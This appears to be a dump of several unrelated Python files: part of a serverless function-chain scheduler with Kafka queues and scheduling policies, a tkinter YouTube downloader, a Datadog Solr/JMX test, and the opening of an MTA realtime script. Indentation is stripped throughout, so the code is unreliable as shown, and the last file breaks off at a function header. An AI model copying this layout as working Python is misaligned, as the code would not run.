'arrivalRateQueue': [timeStamp.start],
'arrivalRate': 0,
'chainFunctionIdList': timeStamp.chainFunctionIdList}
metricServer.arrivalsChainsMetricList.append(tempDictionary)
psMetricServerLock.release()
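# Worked example of the sliding-window rate above (illustrative numbers): with
# 30 queued timestamps spanning 15 seconds, timeDifference is 15 and the
# chain's arrivalRate becomes 30/15 = 2 arrivals per second.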
# Update function specific metrics with a new timestamp
def updateIndividualFunctionMetricList(timeStamp):
newEntry = True
for i in metricServer.individualFunctionMetricList:
if (i['functionId'] == timeStamp.functionId):
newEntry = False
if (timeStamp.finish == 'running'):
if (timeStamp.chainId not in i['chainIdList']):
i['chainIdList'].append(timeStamp.chainId)
i['instancesRunning'] = i['instancesRunning'] + 1
else:
i['instancesRunning'] = i['instancesRunning'] - 1
i['instancesCompleted'] = i['instancesCompleted'] + 1
i['avgRuntime'] = (i['avgRuntime']*(i['instancesCompleted']-1)+(timeStamp.finish-timeStamp.start))/i['instancesCompleted']
if (newEntry):
tempDictionary = { 'functionId': timeStamp.functionId,
'chainIdList': [timeStamp.chainId],
'instancesRunning': 1,
'instancesCompleted': 0,
'avgRuntime': 0}
metricServer.individualFunctionMetricList.append(tempDictionary)
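# Worked example of the incremental average above (illustrative numbers): with a
# previous avgRuntime of 10.0 over 3 completed runs and a new run of 14.0 seconds,
# the update gives (10.0*3 + 14.0)/4 = 11.0.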
# Update aggregate metrics with a new timestamp
def updateCollectiveFunctionLevelMetrics(timeStamp):
if (timeStamp.finish == 'running'):
metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] = metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] + 1
else:
metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] = metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] - 1
metricServer.collectiveFunctionLevelMetric['totalCompletedFunctions'] = metricServer.collectiveFunctionLevelMetric['totalCompletedFunctions'] + 1
# Update function chain specific metrics with a new timestamp
def updateIndividualChainLevelMetrics(timeStamp):
newChainEntry = True
for i in metricServer.individualChainMetricList:
if (i['chainId'] == timeStamp.chainId):
newChainEntry = False
newInstanceEntry = True
for j in i['uniqueInstanceList']:
if ((timeStamp.chainId, timeStamp.instanceId) == j['uid']):
newInstanceEntry = False
if (timeStamp.finish != 'running'):
i['functionsRunning'] = i['functionsRunning'] - 1
else:
i['functionsRunning'] = i['functionsRunning'] + 1
if (timeStamp.nodeId in j['lastNodeIdList'] and timeStamp.finish != 'running'):
j['lastNodeIdList'].remove(timeStamp.nodeId)
if (len(j['lastNodeIdList']) < 1):
j['endTime'] = time.time()
i['instancesRunning'] = i['instancesRunning'] - 1
i['instancesCompleted'] = i['instancesCompleted'] + 1
runtime = j['endTime']-j['startTime']
i['avgRuntime'] = (i['avgRuntime']*(i['instancesCompleted']-1)+runtime)/i['instancesCompleted']
if (newInstanceEntry):
tempDictionary = {
'uid': (timeStamp.chainId, timeStamp.instanceId),
'startTime': time.time(),
'endTime': 'running',
'lastNodeIdList': timeStamp.lastNodeIdList}
i['uniqueInstanceList'].append(tempDictionary)
i['instancesRunning'] = i['instancesRunning'] + 1
i['functionsRunning'] = i['functionsRunning'] + 1
if (newChainEntry):
tempDictionary = { 'chainId': timeStamp.chainId,
'uniqueInstanceList': [{
'uid': (timeStamp.chainId, timeStamp.instanceId),
'startTime': time.time(),
'endTime': 'running',
'lastNodeIdList': timeStamp.lastNodeIdList}],
'chainFunctionIDs': timeStamp.chainFunctionIdList,
'instancesRunning': 1,
'functionsRunning': 1,
'instancesCompleted': 0,
'avgRuntime': 0}
metricServer.individualChainMetricList.append(tempDictionary)
# Update aggregate function chain metrics
def updateCollectiveChainLevelMetrics():
totalRunning = 0
totalCompleted = 0
for i in metricServer.individualChainMetricList:
totalRunning = totalRunning + i['instancesRunning']
totalCompleted = totalCompleted + i['instancesCompleted']
metricServer.collectiveChainLevelMetric['totalRunningChains'] = totalRunning
metricServer.collectiveChainLevelMetric['totalCompletedChains'] = totalCompleted
# Update all instantaneous state metrics with a new timestamp
def updateStateObjects(timeStamp):
csMetricServerLock.acquire()
updateIndividualFunctionMetricList(timeStamp)
updateCollectiveFunctionLevelMetrics(timeStamp)
updateIndividualChainLevelMetrics(timeStamp)
updateCollectiveChainLevelMetrics()
csMetricServerLock.release()
if (raceConditionLock.locked() and timeStamp.finish == 'running'):
raceConditionLock.release()
# Update all arrival related metrics with a new timestamp
def updateArrivalRecords(item):
#temp = item.split("-")
## in-Memory
temp = item.decode("utf-8").split("-")
tempDictionary = json.loads(temp[3].replace("'", "\""))
#tempDictionary['chainFunctionIdList'] = json.loads(tempDictionary['chainFunctionIdList'])
timestamp = TimeStamp(float(temp[2]), 'running', temp[0], tempDictionary['instanceId'],
tempDictionary['chainId'], 'NA', 'NA', 'NA', tempDictionary['chainFunctionIdList'])
csMetricServerLock.acquire()
updateArrivalsChainsMetricList(timestamp)
updateFairShareFunctionQuota()
updateFunctionPriorities(tempDictionary['extras'])
updateChainPriorities(tempDictionary['extras'])
csMetricServerLock.release()
# Update function priorities for reactive priority scheduling
def updateFunctionPriorities(timestamp):
if ('functionPriorities' in timestamp[0]):
for key, value in sorted(timestamp[0]['functionPriorities'].items()):
metricServer.functionPrioritiesList.append(int(key))
#print(key,value)
# Update chain priorities for reactive priority scheduling
def updateChainPriorities(timestamp):
if ('chainPriorities' in timestamp[0]):
for key, value in sorted(timestamp[0]['chainPriorities'].items()):
metricServer.chainPrioritiesList.append(int(key))
#print(key,value)
# Update log data structures according to the input log text
def updateRecords(item):
temp = item.decode("utf-8").split("-")
if (temp[1] == 'start'):
tempDictionary = json.loads(temp[3].replace("'", "\""))
tempDictionary['lastNodeIdList'] = json.loads(tempDictionary['lastNodeIdList'])
tempDictionary['chainFunctionIdList'] = json.loads(tempDictionary['chainFunctionIdList'])
timestamp = TimeStamp(float(temp[2]), 'running', temp[0], tempDictionary['instanceId'],
tempDictionary['chainId'], tempDictionary['functionId'], tempDictionary['nodeId'],
tempDictionary['lastNodeIdList'], tempDictionary['chainFunctionIdList'])
logging_running_records.append(timestamp)
updateStateObjects(timestamp)
elif (temp[1] == 'end'):
tempDictionary = json.loads(temp[3].replace("'", "\""))
for i in logging_running_records:
if (i.type==temp[0] and i.instanceId==tempDictionary['instanceId'] and i.chainId==tempDictionary['chainId'] and
i.functionId==tempDictionary['functionId'] and i.nodeId==tempDictionary['nodeId']):
i.finish = float(temp[2])
logging_finished_records.append(i)
logging_running_records.remove(i)
#print(tempDictionary)
updateStateObjects(i)
break
#printLoggingLists()
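# Example of the log line format parsed above (illustrative values): a record
# such as
#   consumerSide-start-1589000000.0-{'instanceId': 1, 'chainId': 2, ...}
# is split on '-' into (type, start/end marker, epoch time, parameter dict).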
# Consumer side logging thread
def csLogging():
while(True):
time.sleep(inMemorySleep)
if not(inMemoryCSL.empty()):
timeStamp = inMemoryCSL.get().decode("utf-8")
with open("serverLogsCS.txt", "a") as logfile:
logfile.write(str(timeStamp)+'\n')
# Function side logging thread
def fsLogging():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = (serverIp, logger_port)
# Listen for incoming connections
sock.bind(server_address)
sock.listen(15000)
count =0
print('starting Logger up on', server_address)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
            # Receive the data in small chunks and log it
while True:
data = connection.recv(1024)
data = data.decode("utf-8")
if data != '':
lockFunctionSideLogger.acquire()
with open("serverLogs.txt", "a") as logfile:
logfile.write(str(data))
count = count + 1
# print(str(data), count)
#update_records(str(data))
#publish_message(producer_FSQ, kafka_fsq_topic, 'raw', bytes(data, encoding = 'utf-8'))
## in-Memory
inMemoryFSQ.put(bytes(data, encoding = 'utf-8'))
lockFunctionSideLogger.release()
if not data:
# print('no more data from', client_address)
break
finally:
# Clean up the connection
connection.close()
# Entry point for worker threads
# Invokes a serverless function, then queues any children that need to be
# invoked after completion, according to the function chain's DAG
def invoker_thread(chain, timeStampList):
timeStampList.append(time.time())
# Get required information
url = chain.currentNode.function.url
instanceId = chain.instanceID
chainId = chain.chainID
functionId = chain.currentNode.function.id
nodeId = chain.currentNode.nodeID
lastNodeIdList = chain.currentNode.lastNodeIDs
chainFunctionIdList = chain.currentNode.chainFunctionIDs
hybrid = chain.flags["hybrid"]
# Build array of parameters to send to the function
# (mostly needed for uniquely identifying log messages)
PARAM = {"instanceId": instanceId,
"chainId": chainId,
"functionId": functionId,
"nodeId": nodeId,
"lastNodeIdList": str(lastNodeIdList),
"extras": [],
"chainFunctionIdList": str(chainFunctionIdList),
"hybrid": hybrid,
"id": 0}
PARAMS = {"id":str(PARAM),"port":logger_port,"ip":serverIp,"name":"functionSide"}
timeStampList.append(time.time())
timeStamp = 'consumerSide-start-'+str(time.time())+'-'+str(PARAM)
inMemoryCSSQ.put(bytes(timeStamp, encoding = 'utf-8'))
timeStampList.append(time.time())
# Do the invocation
if not mock_invocations:
res = requests.post(url = url, json = PARAMS, timeout = 300)
else:
print("Invoke:", url)
time.sleep(5)
timeStampList.append(time.time())
timeStamp = 'consumerSide-end-'+str(time.time())+'-'+str(PARAM)
inMemoryCSEQ.put(bytes(timeStamp, encoding = 'utf-8'))
timeStampList.append(time.time())
newInvocations = []
# Enqueue children to be invoked later by the scheduler
for i in chain.currentNode.children:
newInvocations.append(ChainState(currentNode=i, instanceID=instanceId, chainID=chainId))
for invocation in newInvocations:
enqueue_invocation(invocation.SerializeToString(), chainAlreadyRunning=True)
if hybrid == "local":
localCloudConcurrency.release()
timeStampList.append(time.time())
def enqueue_pending_or_running(invocation, chainAlreadyRunning):
if chainAlreadyRunning:
inMemoryCRQ.put(invocation)
else:
inMemoryPQ.put(invocation)
def enqueue_simple_priority(invocation, chainAlreadyRunning):
chain_state = inMemory_to_chain_state(invocation)
if chain_state is None:
return
if chain_state.chainID % 2 == 0:
inMemoryHighPriorityQueue.put(invocation)
else:
inMemoryLowPriorityQueue.put(invocation)
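# For example, an invocation whose chainID is 4 lands in inMemoryHighPriorityQueue,
# while chainID 7 lands in inMemoryLowPriorityQueue; simpleQueuePriorityPolicy()
# then always drains the high-priority queue first.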
# Create a connection to the Kafka server
def connect_kafka_producer(url):
_producer = None
try:
_producer = KafkaProducer(bootstrap_servers=[url], api_version=(0, 10))
except Exception as ex:
print('Exception while connecting Kafka')
print(str(ex))
finally:
return _producer
# Publish a message to a Kafka queue
def publish_message(producer_instance, topic_name, key, value):
try:
key_bytes = bytes(key, encoding = 'utf-8')
value_bytes = value
producer_instance.send(topic_name, key=key_bytes, value=value_bytes)
producer_instance.flush()
#print('Message published successfully.')
except Exception as ex:
print('Exception in publishing message')
print(str(ex))
# Convert a Kafka message to a Chain State object
def message_to_chain_state(message):
if (message):
for key,value in message.items():
serialized_chain = value[0].value
chain_state = ChainState()
chain_state.ParseFromString(serialized_chain)
return chain_state
else:
return None
# Convert a queue item to a Chain State object
def inMemory_to_chain_state(message):
if (message):
chain_state = ChainState()
chain_state.ParseFromString(message)
return chain_state
else:
return None
def printLoggingLists():
print("\nrunning records list")
for i in logging_running_records:
print(i.printTimeStamp())
print("finished records list")
for i in logging_finished_records:
print(i.printTimeStamp())
# Class to represent all metadata associated with a timestamp
class TimeStamp:
def __init__(self, start, finish, type, instanceId, chainId, functionId, nodeId, lastNodeIdList, chainFunctionIdList):
self.start = start
self.finish = finish
self.type = type
self.instanceId = instanceId
self.chainId = chainId
self.functionId = functionId
self.nodeId = nodeId
self.lastNodeIdList = lastNodeIdList
self.chainFunctionIdList = chainFunctionIdList
def printTimeStamp(self):
return str(self.start)+"-"+str(self.finish)+"-"+str(self.type)+"-"+str(self.instanceId)+"-"+str(self.chainId)+"-"+str(self.functionId)+"-"+str(self.nodeId)+"-"+str(self.lastNodeIdList)
# Class representing the Metric Server state
class MetricServer:
def __init__(self):
self.collectiveFunctionLevelMetric = {
'totalRunningFunctions': 0,
'totalCompletedFunctions': 0
}
self.collectiveChainLevelMetric = {
'totalRunningChains': 0,
'totalCompletedChains': 0
}
self.functionQuotas = {}
self.functionPrioritiesList = []
self.chainPrioritiesList = []
self.arrivalsChainsMetricList = []
self.individualFunctionMetricList = []
self.individualChainMetricList = []
# collective Function Level Metrics
def getTotalRunningFunctions(self):
return self.collectiveFunctionLevelMetric['totalRunningFunctions']
# collective Chain Level Metrics
# individual function Level Metrics
def getTotalUniqueFunctions(self):
return len(self.individualFunctionMetricList)
def getUniqueFunctionsList(self):
return self.individualFunctionMetricList
# individual chain level Metrics
def getTotalUniqueChains(self):
return len(self.individualChainMetricList)
def getUniqueChainsList(self):
return self.individualChainMetricList
# Currently Running Chains Policy:
# Prioritize finishing function chains that have already started running
# over those that have not started
def currentlyRunningChainsPolicy():
time.sleep(inMemorySleep)
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
return chain
else:
if not(inMemoryPQ.empty()):
chain = inMemory_to_chain_state(inMemoryPQ.get())
return chain
else:
return None
# Fair Share on Chains Policy:
# Assign a fixed concurrency limit to all function chains
def fairShareOnChainsPolicy():
global previousState
time.sleep(inMemorySleep)
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
chainsToAvoid = getCandidateChainsAlreadyUsedQuota()
if (chainsToAvoid == []):
return currentlyRunningChainsPolicy()
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
if (chain.chainID not in chainsToAvoid):
return chain
else:
inMemoryCRQ.put(msg)
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
if (chain.chainID not in chainsToAvoid):
return chain
else:
inMemoryPQ.put(msg)
else:
softLimitPQ = 0
return None
# Returns a list of function chains that fully saturate their respective
# concurrency limits.
def getCandidateChainsAlreadyUsedQuota():
csMetricServerLock.acquire()
candidateList = []
for i in metricServer.getUniqueChainsList():
if (i['functionsRunning'] >= round(concurrency/metricServer.getTotalUniqueChains())):
candidateList.append(i['chainId'])
csMetricServerLock.release()
return candidateList
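# Worked example of the per-chain limit above (illustrative numbers): with
# concurrency = 1000 and 4 unique chains, a chain is skipped by
# fairShareOnChainsPolicy() once round(1000/4) = 250 of its functions are running.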
# Shortest Job First Policy:
# Returns the queued chain invocation with the least time remaining
# (Currently, simply based on historical average runtimes)
def getShortestJobFirst():
time.sleep(inMemorySleep)
# variables
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
msg_baseCase = ''
chain_baseCase = ''
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
# getting first object
if msg_baseCase == '':
msg_baseCase = inMemoryCRQ.get()
chain_baseCase = inMemory_to_chain_state(msg_baseCase)
else:
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
# print((chain.chainID,chain.currentNode.nodeID), (chain_baseCase.chainID,chain_baseCase.currentNode.nodeID))
if (SJFLookup[(chain.chainID,chain.currentNode.nodeID)] < SJFLookup[(chain_baseCase.chainID,chain_baseCase.currentNode.nodeID)]):
inMemoryCRQ.put(msg_baseCase)
msg_baseCase = msg
chain_baseCase = chain
# print('updated baseCase')
else:
inMemoryCRQ.put(msg)
# print('no update')
if (softLimitCRQ == 1):
return chain_baseCase
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
if msg_baseCase == '':
msg_baseCase = inMemoryPQ.get()
chain_baseCase = inMemory_to_chain_state(msg_baseCase)
else:
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
# print((chain.chainID,chain.currentNode.nodeID), (chain_baseCase.chainID,chain_baseCase.currentNode.nodeID))
if (SJFLookup[(chain.chainID,chain.currentNode.nodeID)] < SJFLookup[(chain_baseCase.chainID,chain_baseCase.currentNode.nodeID)]):
inMemoryPQ.put(msg_baseCase)
msg_baseCase = msg
chain_baseCase = chain
# print('updated baseCase')
else:
inMemoryPQ.put(msg)
# print('no update')
if (softLimitPQ == 1):
return chain_baseCase
else:
softLimitPQ = 0
if (chain_baseCase != ''):
return chain_baseCase
return None
# Fair Share on Functions Policy:
# Assign a fixed concurrency limit to all function types that can be invoked
def fairShareOnFunctionsPolicy():
time.sleep(inMemorySleep)
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
functionsToAvoid = getCandidateFunctionsAlreadyUsedQuota()
if (functionsToAvoid == []):
return currentlyRunningChainsPolicy()
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
if (chain.currentNode.function.id not in functionsToAvoid):
return chain
else:
inMemoryCRQ.put(msg)
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
if (chain.currentNode.function.id not in functionsToAvoid):
return chain
else:
inMemoryPQ.put(msg)
else:
softLimitPQ = 0
return None
# Update function-based fair share limits according to what functions
# we have seen so far
def updateFairShareFunctionQuota():
psMetricServerLock.acquire()
totalFunctions = 0
uniqueFunctionList = []
uniqueFunctionQuota = {}
for i in metricServer.arrivalsChainsMetricList:
totalFunctions = totalFunctions + len(i['chainFunctionIdList'])
for j in i['chainFunctionIdList']:
if (j in uniqueFunctionList):
uniqueFunctionQuota[j] = uniqueFunctionQuota[j] + 1
else:
uniqueFunctionList.append(j)
uniqueFunctionQuota[j] = 1
psMetricServerLock.release()
# compute %age quota
for key in uniqueFunctionQuota:
uniqueFunctionQuota[key] = uniqueFunctionQuota[key]/totalFunctions
metricServer.functionQuotas = uniqueFunctionQuota
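# Worked example of the quota computation above (illustrative numbers): if one
# chain lists functions [1, 2] and another lists [1, 3], totalFunctions is 4 and
# metricServer.functionQuotas becomes {1: 0.5, 2: 0.25, 3: 0.25}.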
# Update reactive function-based fair share limits according to
# arrival rates of functions
def updateFairShareArrivalFunctionQuota():
psMetricServerLock.acquire()
totalFunctions = 0
uniqueFunctionList = []
uniqueFunctionQuota = {}
for i in metricServer.arrivalsChainsMetricList:
chainArrivalRate = 1
if (i['arrivalRate'] != 0):
chainArrivalRate = i['arrivalRate']
totalFunctions = totalFunctions + len(i['chainFunctionIdList'])*chainArrivalRate
for j in i['chainFunctionIdList']:
if (j in uniqueFunctionList):
uniqueFunctionQuota[j] = uniqueFunctionQuota[j] + 1 * chainArrivalRate
else:
uniqueFunctionList.append(j)
uniqueFunctionQuota[j] = 1 * chainArrivalRate
psMetricServerLock.release()
# compute %age quota
for key in uniqueFunctionQuota:
uniqueFunctionQuota[key] = uniqueFunctionQuota[key]/totalFunctions
metricServer.functionQuotas = uniqueFunctionQuota
# Returns a list of functions that fully saturate their respective
# concurrency limits.
def getCandidateFunctionsAlreadyUsedQuota():
candidateList = []
functionQuotas = metricServer.functionQuotas
for i in metricServer.getUniqueFunctionsList():
psMetricServerLock.acquire()
#print(i['functionId'],i['instancesRunning'],round(concurrency*functionQuotas[int(i['functionId'])]))
if (i['instancesRunning'] >= round(concurrency*functionQuotas[int(i['functionId'])])):
#if (i['functionsRunning'] >= 1):
candidateList.append(i['functionId'])
psMetricServerLock.release()
return candidateList
previousPriorityList = []
# Strict Function Priority Policy:
# Functions are assigned priorities and higher priority functions
# are always served first
def strictFunctionPriorityPolicy():
global previousPriorityList
time.sleep(inMemorySleep)
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
priorityList = metricServer.functionPrioritiesList
choice = None
choice_msg = ""
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
if (chain.currentNode.function.id in priorityList):
if (choice == None):
choice = chain
choice_msg = msg
elif (priorityList.index(choice.currentNode.function.id)> priorityList.index(chain.currentNode.function.id)):
inMemoryCRQ.put(choice_msg)
choice = chain
choice_msg = msg
else:
inMemoryCRQ.put(msg)
if (priorityList.index(choice.currentNode.function.id) == 0):
return choice
else:
inMemoryCRQ.put(msg)
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
if (chain.currentNode.function.id in priorityList):
if (choice == None):
choice = chain
choice_msg = msg
elif (priorityList.index(choice.currentNode.function.id)> priorityList.index(chain.currentNode.function.id)):
inMemoryPQ.put(choice_msg)
choice = chain
choice_msg = msg
else:
inMemoryPQ.put(msg)
if (priorityList.index(choice.currentNode.function.id) == 0):
return choice
else:
inMemoryPQ.put(msg)
else:
softLimitPQ = 0
return choice
# Hybrid Bin Packing Policy:
# Invoke functions on a local/private cloud, then fall back to
# a public cloud if the local cloud is at full capacity
def hybridBinPackingPolicy():
time.sleep(inMemorySleep)
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
if (localCloudConcurrency._value < 1):
chain.flags["hybrid"] = "remote"
else:
chain.flags["hybrid"] = "local"
return chain
else:
if not(inMemoryPQ.empty()):
chain = inMemory_to_chain_state(inMemoryPQ.get())
if (localCloudConcurrency._value < 1):
chain.flags["hybrid"] = "remote"
else:
chain.flags["hybrid"] = "local"
return chain
else:
return None
# Simple Queue Priority Policy:
# Function level first come first serve, but we prioritize functions
# from the High Priority queue over the Low Priority queue
def simpleQueuePriorityPolicy():
if not(inMemoryHighPriorityQueue.empty()):
msg = inMemoryHighPriorityQueue.get()
chain = inMemory_to_chain_state(msg)
return chain
else:
if not(inMemoryLowPriorityQueue.empty()):
chain = inMemory_to_chain_state(inMemoryLowPriorityQueue.get())
return chain
else:
return None
# instantiating MetricServer
metricServer = MetricServer()
previousState = []
# setup kafka
kafka_url = "localhost:9092"
kafka_pq_topic = "pending_queue"
#print('Kafka setup for PQ ...')
producer_PQ = connect_kafka_producer(kafka_url)
consumer_PQ = KafkaConsumer(kafka_pq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for CRQ ...')
kafka_crq_topic = "chain_running_queue"
producer_CRQ = connect_kafka_producer(kafka_url)
consumer_CRQ = KafkaConsumer(kafka_crq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for FSide-logging ..')
kafka_fsq_topic = "function_side_logging_queue"
producer_FSQ = connect_kafka_producer(kafka_url)
consumer_FSQ = KafkaConsumer(kafka_fsq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for CSide logging ..')
kafka_csq_topic = "consumer_side_logging_queue"
producer_CSQ = connect_kafka_producer(kafka_url)
consumer_CSQ = KafkaConsumer(kafka_csq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for PSide logging ..')
kafka_psq_topic = "producer_side_logging_queue"
producer_PSQ = connect_kafka_producer(kafka_url)
consumer_PSQ = KafkaConsumer(kafka_psq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for CSide logging ..')
kafka_csl_topic = "consumer_side_logging"
producer_CSL = connect_kafka_producer(kafka_url)
consumer_CSL = KafkaConsumer(kafka_csl_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
## in memory queue
inMemoryPQ = queue.Queue(maxsize=queueSize)
inMemoryCRQ = queue.Queue(maxsize=queueSize)
inMemoryFSQ = queue.Queue(maxsize=queueSize)
inMemoryCSQ = queue.Queue(maxsize=queueSize)
inMemoryCSSQ = queue.Queue(maxsize=queueSize)
inMemoryCSEQ = queue.Queue(maxsize=queueSize)
inMemoryPSQ = queue.Queue(maxsize=queueSize)
inMemoryCSL = queue.Queue(maxsize=queueSize)
# Only needed for the simple queue priority policy
inMemoryHighPriorityQueue = queue.Queue(maxsize=queueSize)
inMemoryLowPriorityQueue = queue.Queue(maxsize=queueSize)
# starting various threads
# kafka to in-memory PQ
threading.Thread(target=kafkaToInMemoryPQ).start()
# kafka to in-memory PSQ
threading.Thread(target=kafkaToInMemoryPSQ).start()
#print("Starting Logging Server")
threading.Thread(target=fsLogging).start()
#print("Starting Function Side metric-server")
threading.Thread(target=fsMetricServer).start()
#print("Starting Consumer Side metric-server")
threading.Thread(target=csMetricServer).start()
#print("Starting Producer Side metric-server")
threading.Thread(target=psMetricServer).start()
#print("Starting Consumer Side logger")
threading.Thread(target=csLogging).start()
# Start scheduling function invocations
schedule_invocations()
|
main.py
|
from pytube import YouTube
from tkinter.filedialog import *
from tkinter import *
from tkinter.messagebox import *
from threading import *
#total file size container
file_size=0
#function for updating percentage while downloading
#(recent pytube versions pass (stream, chunk, bytes_remaining) to this callback)
def progress(stream,chunk,bytes_remaining,remaining=None):
    #fetching percentage of file that has been downloaded
    file_downloaded=(file_size-bytes_remaining)
    percent=(file_downloaded/file_size) * 100
    btn.config(text="{:00.0f} % downloaded".format(percent))
def startDownload():
global file_size
try:
#storing url given by user
url=urlField.get()
#changing button text
btn.config(text="Please wait...")
#disabling button
btn.config(state=DISABLED)
#opens dialog box to ask for saving location
        path=askdirectory()
        #askdirectory returns an empty string if the dialog is cancelled
        if not path:
            btn.config(text="Start Download")
            btn.config(state=NORMAL)
            return
ob=YouTube(url,on_progress_callback=progress)
strm=ob.streams.get_highest_resolution()
#setting video size
file_size=strm.filesize
#setting video title and description
vTitle.config(text=strm.title)
vTitle.pack(side=TOP,pady=10)
vDesc.config(text=ob.description)
vDesc.pack(side=TOP,pady=10)
#command to start download
strm.download(path)
#setting button back to normal
btn.config(text="Start Download")
btn.config(state=NORMAL)
showinfo("Download Finished","Downloaded successfully")
urlField.delete(0,END)
#hiding video title
vTitle.pack_forget()
except Exception as e:
print(e)
showinfo("Error","Some error occurred...")
btn.config(text="Start Download")
btn.config(state=NORMAL)
urlField.delete(0,END)
#function to start download thread
def startDownloadThread():
#create thread
thread=Thread(target=startDownload)
thread.start()
#Building gui using tkinter
main=Tk()
#setting title
main.title("Youtube Downloader")
#setting icon
main.iconbitmap("youtube.ico")
main.geometry("500x600")
#heading icon
file=PhotoImage(file='youtube.png')
headingIcon=Label(main,image=file)
headingIcon.pack(side=TOP)
#url textfield
urlField=Entry(main,font=("verdana",18),justify=CENTER)
urlField.pack(side=TOP,fill=X,padx=10)
#download button
btn=Button(main,text="start download",font=("verdana",18),relief='ridge',command=startDownloadThread)
btn.pack(side=TOP,pady=10)
#video title
vTitle=Label(main,text="Video title",font=("verdana",13))
#video description
vDesc=Label(main,text="Video Description")
main.mainloop()
|
test_solr.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import threading
import time
from types import ListType
import unittest
import mock
import os
from nose.plugins.attrib import attr
import logging
from aggregator import MetricsAggregator
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/tmp/datadog/collector.log',
'forwarder_log_file': '/tmp/datadog/forwarder.log',
'dogstatsd_log_file': '/tmp/datadog/dogstatsd.log',
'jmxfetch_log_file': '/tmp/datadog/jmxfetch.log',
'go-metro_log_file': '/tmp/datadog/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from dogstatsd import Server
from jmxfetch import JMXFetch
STATSD_PORT = 8127
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='solr')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__))
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testTomcatMetrics(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 8, metrics)
self.assertEquals(len([t for t in metrics if 'instance:solr_instance' in t['tags'] and t['metric'] == "jvm.thread_count"]), 1, metrics)
self.assertTrue(len([t for t in metrics if "jvm." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
self.assertTrue(len([t for t in metrics if "solr." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
|
mta_realtime.py
|
import gtfs_realtime_pb2, nyct_subway_pb2
import urllib2, contextlib, datetime, copy
from operator import itemgetter
from pytz import timezone
import threading, time
import csv, math, json
import logging
import google.protobuf.message
def distance(p1, p2):
